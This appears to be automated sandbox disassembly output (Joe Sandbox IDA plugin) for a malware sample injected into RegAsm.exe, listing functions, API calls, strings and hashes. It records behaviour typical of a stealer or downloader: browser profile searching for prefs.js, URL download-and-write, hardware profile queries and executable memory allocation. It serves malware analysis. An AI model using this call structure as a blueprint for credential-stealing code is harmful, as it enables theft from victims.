API ID: Heap$AllocOpenProcessQueryValue
String ID:
API String ID: 3676486918-0
Opcode ID: 5a348dce4926add7b50cf3e1a3237f7deaf910ff3e5a2bc42b85e6f6daaeb5b6
Instruction ID: c6a06fe1a5752460b6d2ee94bc9516a9de2a98ba0b24791e6944b9a77995073e
Opcode Fuzzy Hash: 5a348dce4926add7b50cf3e1a3237f7deaf910ff3e5a2bc42b85e6f6daaeb5b6
Instruction Fuzzy Hash: 11F05E7A240214FFFB209BD1DD0EFAA7A7EEB45B04F101035FB01A61A1D7B05900DB64

Function 00402308 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 116COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT ref: 0040238D

Strings

6%@, xrefs: 00402312, 0040231B
6%@, xrefs: 0040242C, 00402420

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: 6%@$6%@
API String ID: 0-3369382886
Opcode ID: 1671fecbb1ebbe02e7eb2cc7cf41ad1b7ad139c209bd50c1cd2ae32b560b646f
Instruction ID: badd9bf96c2c88f43ed760c6ea304aae97d5f1f2e5982ea7d2ae84e0ed7fb19c
Opcode Fuzzy Hash: 1671fecbb1ebbe02e7eb2cc7cf41ad1b7ad139c209bd50c1cd2ae32b560b646f
Instruction Fuzzy Hash: 9C4146716001199FCB01CF69D8806EDBBB1FF89318F1484BADC55EB395C3B8A982CB54

Function 004071C6 Relevance: 4.7, APIs: 3, Instructions: 231stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 004071CB

Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D

lstrlenA.KERNEL32(00000000), ref: 00407402
lstrlenA.KERNEL32(00000000), ref: 00407416

Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB

Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83

Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A

Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA

Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog$lstrcpy$lstrlen$lstrcat$CreateObjectSingleThreadWait
String ID:
API String ID: 3193997572-0
Opcode ID: 5ba7b4a78e4291fb47083d66041ac5aa186f629f7f3f62ee87277b1a39885f65
Instruction ID: 8b519aabfee9ba70be02ce4985194bad941b289c0cb22c07f372139e5295b5b5
Opcode Fuzzy Hash: 5ba7b4a78e4291fb47083d66041ac5aa186f629f7f3f62ee87277b1a39885f65
Instruction Fuzzy Hash: 89A13C71904248EADB15EBE5D955BEDBBB4AF18308F5040BEE406735C2DB782B0CDB26

Function 00411EB8 Relevance: 4.2, APIs: 1, Strings: 1, Instructions: 657COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00411EBD

Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D

Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83

Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB

Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A

Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 00404DCA: _EH_prolog.MSVCRT ref: 00404DCF
Part of subcall function 00404DCA: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404E1E
Part of subcall function 00404DCA: StrCmpCA.SHLWAPI(?), ref: 00404E38
Part of subcall function 00404DCA: InternetOpenUrlA.WININET(?,00000000,00000000,00000000,-00800100,00000000), ref: 00404E5C
Part of subcall function 00404DCA: CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00404E7D
Part of subcall function 00404DCA: InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00404EC8
Part of subcall function 00404DCA: CloseHandle.KERNEL32(?,?,00000400), ref: 00404EE2
Part of subcall function 00404DCA: InternetCloseHandle.WININET(00000000), ref: 00404EE9
Part of subcall function 00404DCA: InternetCloseHandle.WININET(?), ref: 00404EF2

Part of subcall function 00404DCA: WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00404EA4

Strings

B, xrefs: 00412749

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prologInternetlstrcpy$CloseFileHandle$Openlstrcat$CreateReadWritelstrlen
String ID: B
API String ID: 1244342732-1255198513
Opcode ID: 445673c05ee04e935469998d6e1ad7673640e60efa6b345dae39504cf7bb3895
Instruction ID: 7cb4668c239315be8392dc4a7e389f554ac74aed044ceac891e831ccfcc386df
Opcode Fuzzy Hash: 445673c05ee04e935469998d6e1ad7673640e60efa6b345dae39504cf7bb3895
Instruction Fuzzy Hash: 64529E70904288EADB15EBE4D556BDDBBB49F28308F5040BEE449736C2DB781B4CCB66

Function 0040B8AF Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 240COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040B8B4

Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D

Part of subcall function 00410D21: SHGetFolderPathA.SHELL32(00000000,00425C93,00000000,00000000,?), ref: 00410D52

Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83

Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A

Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB

Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 0040B463: _EH_prolog.MSVCRT ref: 0040B468
Part of subcall function 0040B463: FindFirstFileA.KERNEL32(00000000,?,00000000,?,00425F68,?,?,00425C47,?,00000000,?), ref: 0040B4E7
Part of subcall function 0040B463: StrCmpCA.SHLWAPI(?,00425F6C,?,00000000,?), ref: 0040B50B
Part of subcall function 0040B463: StrCmpCA.SHLWAPI(?,00425F70,?,00000000,?), ref: 0040B525
Part of subcall function 0040B463: StrCmpCA.SHLWAPI(?,prefs.js,00000000,?,?,?,00425F74,?,?,00425C4A,?,00000000,?), ref: 0040B5C1

Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066

Strings

\..\, xrefs: 0040B97C

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog$lstrcpy$lstrcat$FileFindFirstFolderPathlstrlen
String ID: \..\
API String ID: 271224408-4220915743
Opcode ID: 31a071b3b6c9971b1f7e1023c1ba4238a359e04ad54659801a86d4040e764eb8
Instruction ID: 6c2274da3a54e78b00ef882603e8e3fe35884a936ae60c4e7c9158b4c67c68f5
Opcode Fuzzy Hash: 31a071b3b6c9971b1f7e1023c1ba4238a359e04ad54659801a86d4040e764eb8
Instruction Fuzzy Hash: DFA15FB1900288AACB14FBE5D556BDDBBB4AF19308F50417EE845736C2DB78170CCBA6

Function 00405E09 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 107COMMON

Download Yara Rule

Strings

(@, xrefs: 00405ED5, 00405EB1, 00405EB9

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: (@
API String ID: 0-1346038526
Opcode ID: 14c096e7427ac56c3ceb53db33e20d9e6aa561a8e8b35fd361e21ef125d2a38f
Instruction ID: a472476b622eda2900000c9113d1a74c1da44a18ff9f30f91f8d3e78ba7694db
Opcode Fuzzy Hash: 14c096e7427ac56c3ceb53db33e20d9e6aa561a8e8b35fd361e21ef125d2a38f
Instruction Fuzzy Hash: 2B4136B190461AAFCF14EF94D9909AFBBB1EB04314F10447FEA05B7391D6789A818F98

Function 00405D69 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,00000002,00000002,?,00000000,?,?,00405E98), ref: 00405DE8

Strings

, xrefs: 00405DBB

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-3916222277
Opcode ID: b6b970fa2179954ca2d24890c2a9fa622aa91f7321e7267b4cd12840a3a9e1b1
Instruction ID: ced7d7a04c1373fcb48adb74aa7fd2d2290691d2abba1c02f51b3daadd827661
Opcode Fuzzy Hash: b6b970fa2179954ca2d24890c2a9fa622aa91f7321e7267b4cd12840a3a9e1b1
Instruction Fuzzy Hash: A7113A71515A0AEBEF20CF94C9887ABB7F5FF04340F6084279541E62C0D7789A85EFA9

Function 004104A2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetCurrentHwProfileA.ADVAPI32(?), ref: 004104B3

Strings

Unknown, xrefs: 004104C6

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CurrentProfile
String ID: Unknown
API String ID: 2104809126-1654365787
Opcode ID: 5e10422413539b42bf5c0f3fa128b12628a931a4afcc5f0832f78eb075a7ee3b
Instruction ID: 3d2c3ff73f9fd288211faec72780458d1f3465e1919466c86557ea86080fd633
Opcode Fuzzy Hash: 5e10422413539b42bf5c0f3fa128b12628a931a4afcc5f0832f78eb075a7ee3b
Instruction Fuzzy Hash: 49E01270A0010DFBDB10DBA4DA85FDE77BC6B04348F508525EA45D3181DBB8E649DBA9

Function 192604D0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15COMMON

Download Yara Rule

Strings

failed to allocate %u bytes of memory, xrefs: 192604E7

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: failed to allocate %u bytes of memory
API String ID: 0-1168259600
Opcode ID: 9d8bcffbf79d0b5df0212cffc436f39662c1475ef3f35b94bd5f9eb307b78675
Instruction ID: 275a817b63f48667ae7cc8c679c446cbf27879a4f7acd3fbe74211006f161f0a
Opcode Fuzzy Hash: 9d8bcffbf79d0b5df0212cffc436f39662c1475ef3f35b94bd5f9eb307b78675
Instruction Fuzzy Hash: 72D02267DCC22223D2211180EC01ACB3D504B909A2F0D8070FD8C1A230D155A99083D3

Function 194199D8 Relevance: 3.1, APIs: 2, Instructions: 65COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,00000000,19419AE5,1946D448,0000000C), ref: 19419A24
GetFileType.KERNEL32(00000000,?,?,?,?,?,?,?,00000000,19419AE5,1946D448,0000000C), ref: 19419A36

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: 0231af3fcfc44b0342b50b8e54034a60ceef8f353762d2b10d50fc8b32f8962f
Instruction ID: c1973caca0a6b6b1f7368956d00456a14a57b8b2b71e1c6c9e9b61287044f8ed
Opcode Fuzzy Hash: 0231af3fcfc44b0342b50b8e54034a60ceef8f353762d2b10d50fc8b32f8962f
Instruction Fuzzy Hash: 6511063D6047D15AD7344A3EAC982127B94E7462F0B2C073AD4BB8E6F1C231F44AC650

Function 00410CDD Relevance: 3.0, APIs: 2, Instructions: 23COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00410CE2
GetFileAttributesA.KERNEL32(00000000,?,0040BAC2,?,00425C4E,?,?), ref: 00410CF6

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AttributesFileH_prolog
String ID:
API String ID: 3244726999-0
Opcode ID: 9858cde492175e4580259da3237b0586ce143e2643660db7b1ce31a318e284b7
Instruction ID: 23f90a50d93cb2e1358a652bfa6555910aea1ee46ff196ae4cba0ec79dbf811d
Opcode Fuzzy Hash: 9858cde492175e4580259da3237b0586ce143e2643660db7b1ce31a318e284b7
Instruction Fuzzy Hash: BEE09B305005149BC714AFA4E4016CDB720EF05764F10422EE866A25D5C7385B45C684

Function 00405A53 Relevance: 2.6, APIs: 2, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,00000000,00003000,00000040,?,00000000,?,?,00405E55,00000000,00000000), ref: 00405AB2
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040,?,00000000,?,?,00405E55,00000000,00000000), ref: 00405ADE

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 1c251f108aa80a173728c8da74072c4a570c277b0e51025ace0a2ede7004c7e8
Instruction ID: 0100467e13e99263edfc9c933cb68e83bd3c9ecc7dabaf0022702558aaebf942
Opcode Fuzzy Hash: 1c251f108aa80a173728c8da74072c4a570c277b0e51025ace0a2ede7004c7e8
Instruction Fuzzy Hash: 2521AE71700B059BDB24CFB4CC81BABB7F5EB44314F24492AE61AD72D0D278AD408F18

Function 0040D3FA Relevance: 1.7, APIs: 1, Instructions: 221COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040D3FF

Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D

Part of subcall function 00410D21: SHGetFolderPathA.SHELL32(00000000,00425C93,00000000,00000000,?), ref: 00410D52

Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83

Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A

Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB

Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980

Part of subcall function 00410CDD: _EH_prolog.MSVCRT ref: 00410CE2
Part of subcall function 00410CDD: GetFileAttributesA.KERNEL32(00000000,?,0040BAC2,?,00425C4E,?,?), ref: 00410CF6

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 0040A893: _EH_prolog.MSVCRT ref: 0040A898

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog$lstrcpy$lstrcat$AttributesFileFolderPathlstrlen
String ID:
API String ID: 2625060131-0
Opcode ID: ade7fe7f8a5f33038c24079659326912bd14c3b07ed2e307a062eb76aaeffcf7
